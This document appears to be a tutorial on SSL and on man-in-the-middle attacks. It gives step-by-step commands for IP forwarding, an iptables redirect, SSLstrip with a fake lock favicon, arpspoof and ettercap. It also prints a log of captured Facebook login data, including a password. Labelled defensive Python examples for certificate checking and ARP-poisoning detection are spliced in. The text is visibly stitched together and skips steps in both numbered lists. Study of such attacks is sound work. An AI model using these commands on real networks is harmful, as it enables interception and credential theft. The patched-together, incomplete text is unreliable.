What is SSL and how it Works:
1. The client browser requests its identification from the web server.
3. The browser checks the certificate against its list of trusted CAs, and checks that the certificate is unexpired, unrevoked and that its name is valid. If the browser trusts the certificate, it creates a session key (a symmetric key), encrypts it with the server's public key and sends it to the server.
4. The server decrypts the symmetric session key and sends back to the client an acknowledgement encrypted with the session key, which starts the encrypted session.
5. The server and the client now encrypt all transmitted data using the symmetric session key.
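Step 3 is where the protection against an interposed proxy actually lives, so it is worth seeing the four checks spelled out. The following is an added example, not code from the original post: it runs the trust, validity, revocation and name checks over certificates laid out the way Python's ssl.SSLSocket.getpeercert() returns them. The certificates, the CA list, the revocation list and the fixed clock are all constructed sample data; a forged certificate with the right name but an unknown issuer fails exactly one check, which is the whole reason the lock icon cannot be faked against a browser that validates.

```python
import ssl

# Constructed sample certificates in the dict layout returned by
# ssl.SSLSocket.getpeercert(); these are not real certificates.
TRUSTED_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "issuer": ((("organizationName", "Example CA Inc"),),
               (("commonName", "Example Trusted Root CA"),)),
    "notBefore": "Jan  1 00:00:00 2013 GMT",
    "notAfter": "Dec 31 23:59:59 2014 GMT",
    "serialNumber": "0A1B2C3D",
    "subjectAltName": (("DNS", "www.example.com"), ("DNS", "example.com")),
}

# Same subject name, but signed by a CA the browser has never heard of:
# this is what a MITM proxy's forged certificate looks like to the client.
FORGED_CERT = dict(TRUSTED_CERT,
                   issuer=((("commonName", "Attacker CA"),),),
                   serialNumber="FFFF0001")

# Browser-side trust data (constructed): the CA store and a revocation list.
TRUSTED_CAS = {"Example Trusted Root CA"}
REVOKED_SERIALS = {"DEADBEEF"}

# Fixed "clock" (constructed) so the checks are reproducible.
NOW = ssl.cert_time_to_seconds("Jun 23 05:32:54 2013 GMT")


def _first_attr(rdn_sequence, attr):
    """Return the first value of `attr` from a getpeercert()-style name tuple."""
    for rdn in rdn_sequence:
        for key, value in rdn:
            if key == attr:
                return value
    return None


def _name_matches(pattern, hostname):
    """Case-insensitive match; a leading '*.' covers exactly one label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern.startswith("*."):
        labels = hostname.split(".")
        return len(labels) > 1 and ".".join(labels[1:]) == pattern[2:]
    return pattern == hostname


def _hostname_matches(cert, hostname):
    names = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not names:  # no SAN: fall back to the subject common name
        cn = _first_attr(cert.get("subject", ()), "commonName")
        names = [cn] if cn else []
    return any(_name_matches(n, hostname) for n in names)


def validate_certificate(cert, hostname, trusted_cas, revoked_serials, now_ts):
    """Run the checks from step 3; returns the list of failures (empty = trusted)."""
    failures = []
    if _first_attr(cert.get("issuer", ()), "commonName") not in trusted_cas:
        failures.append("issuer is not in the trusted CA list")
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    if not (not_before <= now_ts <= not_after):
        failures.append("certificate is expired or not yet valid")
    if cert.get("serialNumber") in revoked_serials:
        failures.append("certificate has been revoked")
    if not _hostname_matches(cert, hostname):
        failures.append("name does not match requested host")
    return failures


if __name__ == "__main__":
    for label, cert in (("trusted", TRUSTED_CERT), ("forged", FORGED_CERT)):
        result = validate_certificate(cert, "www.example.com",
                                      TRUSTED_CAS, REVOKED_SERIALS, NOW)
        print(label, "->", result or "OK, browser would trust it")
```

Real browsers additionally verify the signature chain up to the root and query OCSP or CRLs for revocation; the revocation set here stands in for that lookup. The point the example makes is that a forged certificate can carry the correct host name and valid dates and still fail, because the issuer check is anchored in the client's own CA store.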
What is Man-in-the-Middle Attack:
If the command is not accepted, try the following instead:
$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
user@bt:~$ sudo -i
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
0
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
2. Redirecting traffic to the port that SSLstrip listens on:
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
3. Running SSLstrip:
user@bt:/pentest/web/sslstrip$ sudo python sslstrip.py -k -l 1234 -f lock.ico
- -k: kills all currently active sessions, forcing users to log in to their websites again.
- -l: the port to listen on.
- -f: substitutes the HTTPS lock favicon to deceive the client into thinking the connection is secure.
4. ARP Spoofing (ARP Cache Poisoning) your network using arpspoof tool:
$ arpspoof -i <interface> -t <targetIP> <gatewayIP>
5. Running ettercap to capture the username and password in the clear:
$ ettercap -Tq -i <interface>
- -T: runs ettercap in text mode.
- -q: quiet mode; it does not print packet content. It is useful if you want to convert a pcap file to ettercap log files.
Or you can get them from the SSLstrip log as below:
user@bt:~$ cat /pentest/web/sslstrip/sslstrip.log
2013-06-23 05:32:54,818 SECURE POST Data (www.facebook.com): lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US
2013-06-23 05:32:57,997 SECURE POST Data (www.facebook.com): lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US
2013-06-23 05:33:15,696 SECURE POST Data (www.facebook.com): lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023259_32LY&lgnjs=n&locale=en_US
Defensive actions that the security professional should take:
- The Dynamic ARP Inspection feature can be used to protect against ARP spoofing.
- Make sure that the lock beside the URL bar is present and that its colour is green, as shown below; this makes you "slightly" sure that the connection between client and server is encrypted end to end.
- Trusted certificate example:
Bad certificate example: in the following example a MITM attack occurs. The traffic between the victim (the client) and the attacker is encrypted with a certificate issued by the attacker; the attacker decrypts the traffic, compromises it, encrypts it again with the correct certificate (issued by the trusted CA) and finally sends it to the server.
- Real-life practices.
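Dynamic ARP Inspection stops the poisoning at the switch, but a host can also notice it happening to itself. The following is an added example, not code from the original post or from any of the tools it uses: it compares two readings of the Linux ARP cache and raises the two signals that step 4 above leaves behind on the victim, namely the gateway's MAC address changing, and one MAC address answering for the gateway's IP and another host's IP at the same time. Both snapshots are constructed in the layout of /proc/net/arp (the real file is read with open("/proc/net/arp").read()); the interface name, addresses and MACs are sample values.

```python
from collections import defaultdict

# Constructed /proc/net/arp snapshots in the layout the Linux kernel prints.
# The second one shows what the victim's cache looks like after poisoning:
# the gateway's IP now resolves to the MAC already used by 192.168.1.20.
ARP_BEFORE = """IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.20     0x1         0x2         aa:bb:cc:dd:ee:ff     *        eth0
192.168.1.30     0x1         0x2         66:77:88:99:aa:bb     *        eth0
"""
ARP_AFTER = """IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:ff     *        eth0
192.168.1.20     0x1         0x2         aa:bb:cc:dd:ee:ff     *        eth0
192.168.1.30     0x1         0x2         66:77:88:99:aa:bb     *        eth0
"""

GATEWAY_IP = "192.168.1.1"  # sample value; take it from `ip route` on a real host


def parse_proc_net_arp(text):
    """Map IP -> lowercased MAC; skips the header line and incomplete entries."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3].lower()
        # Flags 0x0 means the entry is unresolved; the all-zero MAC is a placeholder.
        if flags == "0x0" or mac == "00:00:00:00:00:00":
            continue
        table[ip] = mac
    return table


def arp_alerts(before, after, gateway_ip):
    """Return human-readable alerts for the two ARP poisoning signatures."""
    alerts = []
    old, new = before.get(gateway_ip), after.get(gateway_ip)
    # Signal 1: the gateway's MAC changed between readings.
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} changed MAC {old} -> {new}")
    # Signal 2: one MAC now answers for several IPs (the spoofer's MAC is
    # mapped to the gateway IP while it keeps its own address).
    by_mac = defaultdict(set)
    for ip, mac in after.items():
        by_mac[mac].add(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"MAC {mac} answers for several IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    before = parse_proc_net_arp(ARP_BEFORE)
    after = parse_proc_net_arp(ARP_AFTER)
    for alert in arp_alerts(before, after, GATEWAY_IP) or ["no ARP anomalies"]:
        print(alert)
```

The gateway MAC change is the strong signal; a single MAC legitimately answering for several IPs does occur (a router with secondary addresses, or a VRRP pair), so treat that one as a prompt to check rather than a verdict. Pinning the gateway with a static ARP entry removes the first signal's ambiguity entirely, and tools such as arpwatch do this same comparison continuously on the wire rather than by polling the cache.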